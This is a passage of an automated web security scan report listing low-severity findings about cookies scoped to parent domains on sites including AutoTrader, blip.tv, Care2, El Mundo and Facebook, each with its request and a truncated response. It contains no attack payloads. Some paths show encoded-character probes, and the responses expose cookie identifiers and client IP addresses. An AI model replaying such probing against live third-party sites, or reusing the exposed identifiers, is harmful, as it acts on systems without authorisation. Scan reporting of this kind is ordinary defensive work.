Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=1250484234.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

13.175. http://www.autotrader.com/research/certified-cars/index.jsp/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /research/certified-cars/index.jsp/x22

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • v1st=49F204915327FA62; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295885065453031; path=/; expires=Sat, 03-Jan-15 16:04:25 GMT; domain=.autotrader.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /research/certified-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:25 GMT
Server: Apache
Set-Cookie: v1st=49F204915327FA62; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885065453031; path=/; expires=Sat, 03-Jan-15 16:04:25 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1787355146.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

13.176. http://www.autotrader.com/research/index.jsp/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /research/index.jsp/x22

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • v1st=2D8D8CB669EE0E07; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295885066866955; path=/; expires=Sat, 03-Jan-15 16:04:26 GMT; domain=.autotrader.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /research/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:26 GMT
Server: Apache
Set-Cookie: v1st=2D8D8CB669EE0E07; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885066866955; path=/; expires=Sat, 03-Jan-15 16:04:26 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1971904522.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

13.177. http://www.autotrader.com/research/new-cars/index.jsp/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /research/new-cars/index.jsp/x22

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • v1st=FD01CADD9CE8D858; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295885067871732; path=/; expires=Sat, 03-Jan-15 16:04:27 GMT; domain=.autotrader.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /research/new-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:27 GMT
Server: Apache
Set-Cookie: v1st=FD01CADD9CE8D858; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885067871732; path=/; expires=Sat, 03-Jan-15 16:04:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=2525552650.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

13.178. http://www.autotrader.com/research/used-cars/index.jsp/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /research/used-cars/index.jsp/x22

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • v1st=F1B5B0190A0903E5; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295885064281746; path=/; expires=Sat, 03-Jan-15 16:04:24 GMT; domain=.autotrader.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /research/used-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:24 GMT
Server: Apache
Set-Cookie: v1st=F1B5B0190A0903E5; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885064281746; path=/; expires=Sat, 03-Jan-15 16:04:24 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1871241226.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

13.179. http://www.autotrader.com/x22/x3e/x3cli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /x22/x3e/x3cli

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • v1st=44290BD80D43DD62; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295885061096866; path=/; expires=Sat, 03-Jan-15 16:04:21 GMT; domain=.autotrader.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x22/x3e/x3cli HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:21 GMT
Server: Apache
Set-Cookie: v1st=44290BD80D43DD62; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885061096866; path=/; expires=Sat, 03-Jan-15 16:04:21 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1351147530.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

13.180. http://www.autotraderclassics.com/find/index.xhtml/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotraderclassics.com
Path:   /find/index.xhtml/x22

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • v1st=AD90949C1AABB6BF; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotraderclassics.com
  • ATC_ID=216.66.31.240.1295885070163888; path=/; expires=Sat, 03-Jan-15 16:04:30 GMT; domain=.autotraderclassics.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /find/index.xhtml/x22 HTTP/1.1
Host: www.autotraderclassics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 15 Jan 2011 12:37:21 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Date: Mon, 24 Jan 2011 16:04:30 GMT
Content-Length: 19116
Connection: close
Set-Cookie: v1st=AD90949C1AABB6BF; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotraderclassics.com
Set-Cookie: ATC_ID=216.66.31.240.1295885070163888; path=/; expires=Sat, 03-Jan-15 16:04:30 GMT; domain=.autotraderclassics.com
Set-Cookie: BIGipServerwww.autotraderclassics.com=3985170442.14360.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<script type='text/ja
...[SNIP]...

13.181. http://www.autotraderclassics.com/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotraderclassics.com
Path:   /x22

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • v1st=38C713FCEE18F8B0; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotraderclassics.com
  • ATC_ID=216.66.31.238.1295885069167883; path=/; expires=Sat, 03-Jan-15 16:04:29 GMT; domain=.autotraderclassics.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x22 HTTP/1.1
Host: www.autotraderclassics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 15 Jan 2011 12:37:21 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Date: Mon, 24 Jan 2011 16:04:29 GMT
Content-Length: 19116
Connection: close
Set-Cookie: v1st=38C713FCEE18F8B0; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotraderclassics.com
Set-Cookie: ATC_ID=216.66.31.238.1295885069167883; path=/; expires=Sat, 03-Jan-15 16:04:29 GMT; domain=.autotraderclassics.com
Set-Cookie: BIGipServerwww.autotraderclassics.com=4203274250.14360.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<script type='text/ja
...[SNIP]...

13.182. http://www.backtype.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.backtype.com
Path:   /search

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • BT=bb2426ba4c18241d1545e90dfa404f4a; expires=Wed, 23-Feb-2011 23:56:54 GMT; path=/; domain=.backtype.com; HttpOnly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search HTTP/1.1
Host: www.backtype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Jan 2011 23:56:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: BT=bb2426ba4c18241d1545e90dfa404f4a; expires=Wed, 23-Feb-2011 23:56:54 GMT; path=/; domain=.backtype.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3713

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <title>Sorry &mdash;
...[SNIP]...

13.183. http://www.blip.tv/about/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /about/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • tab_state=about; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:12:59 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=about; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:12:59 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 16917
Date: Tue, 25 Jan 2011 13:12:59 GMT
X-Varnish: 829691482
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...

13.184. http://www.blip.tv/blogs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /blogs/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • tab_state=prefs; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:02 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-otter-skin: blipnew
Vary: Cookie
Set-Cookie: tab_state=prefs; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:02 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 10640
Date: Tue, 25 Jan 2011 13:13:02 GMT
X-Varnish: 496204649
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...

13.185. http://www.blip.tv/prefs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /prefs/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • tab_state=prefs; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:19 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /prefs/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=prefs; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:19 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 14134
Date: Tue, 25 Jan 2011 13:13:19 GMT
X-Varnish: 2104818017
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...

13.186. http://www.care2.com/news/news_post.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.care2.com
Path:   /news/news_post.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • c2_user_state=38cf88fe52bbea1af5f9ce118bb02342%3A0; path=/; domain=.care2.com
  • c2_user_state=e009b77c4218ecc15ebbe840c71236b3%3A0; path=/; domain=.care2.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/news_post.html?url={u}&title={t} HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 13:14:34 GMT
Server: Apache/2.2.8
Set-Cookie: c2_user_state=38cf88fe52bbea1af5f9ce118bb02342%3A0; path=/; domain=.care2.com
Set-Cookie: c2_user_state=e009b77c4218ecc15ebbe840c71236b3%3A0; path=/; domain=.care2.com
Location: http://www.care2.com/news/compose?sharehint=news&share[share_type]news&bookmarklet=Y&share[title]=%7Bt%7D&share[link_url]=%7Bu%7D&share[content]=
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html


13.187. http://www.elmundo.es/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elmundo.es
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • ELMUNDO_idusr=TT5aC8CoFBUAAB8okbI-c2f1049e2d4516c17b18641aef04f3d5; expires=Fri, 24 Jan 2014 05:05:15 GMT; path=/; domain=.elmundo.es
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.elmundo.es
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Date: Tue, 25 Jan 2011 05:05:15 GMT
Content-Type: text/html
Connection: close
Cache-Control: no-cache
X-Accel-Cache-Control: no-cache
Set-Cookie: ELMUNDO_idusr=TT5aC8CoFBUAAB8okbI-c2f1049e2d4516c17b18641aef04f3d5; expires=Fri, 24 Jan 2014 05:05:15 GMT; path=/; domain=.elmundo.es
Content-Length: 148754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

13.188. http://www.employmentguide.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.employmentguide.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • SITEMODE=desktop; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.employmentguide.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.employmentguide.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 23:59:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
IISExport: This web site was exported using IIS Export v4.2
Content-type: text/html
Page-Completion-Status: Normal
Expires: 01/24/11
Pragma: no-cache
cache-control: no-cache
Page-Completion-Status: Normal
Set-Cookie: L=Dallas%2C+TX; path=/;
Set-Cookie: SITEMODE=desktop; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.employmentguide.com;
Set-Cookie: BIGipServeremploymentguide_pool=889387786.20480.0000; expires=Tue, 25-Jan-2011 01:59:20 GMT; path=/

...[SNIP]...

13.189. http://www.facebook.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • lsd=fYoRD; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=fYoRD; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:15:00 GMT
Content-Length: 30560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

13.190. http://www.facebook.com/%s

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /%s

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • lsd=NgpY2; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /%s HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=NgpY2; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:49 GMT
Content-Length: 11704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

13.191. http://www.facebook.com/2008/fbml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • lsd=2sxL4; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=2sxL4; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:04 GMT
Content-Length: 11725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

13.192. http://www.facebook.com/7NEWS

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /7NEWS

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • lsd=aYRu9; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /7NEWS HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=aYRu9; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:40 GMT
Content-Length: 174522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

13.193. http://www.facebook.com/LIMEprpromo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /LIMEprpromo

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • lsd=Tpmq1; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /LIMEprpromo HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
